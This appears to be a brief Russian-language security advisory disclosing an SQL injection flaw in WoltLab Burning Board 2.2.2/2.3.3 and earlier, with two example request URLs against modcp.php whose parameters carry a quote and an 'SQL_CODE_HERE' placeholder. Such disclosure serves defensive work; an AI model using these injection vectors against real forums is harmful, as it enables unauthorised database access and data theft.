Программа: WoltLab Burning Board 2.2.2/2.3.3 и более ранние
версии

Уязвимость позволяет удаленному
пользователю внедрить произвольные SQL
команды.

Пример/Эксплоит:

/modcp.php?action=post_del&x=’SQ L_CODE_HERE
/modcp.php?action=post_del&x=6&y=’SQL_CODE_HERE



Оставить мнение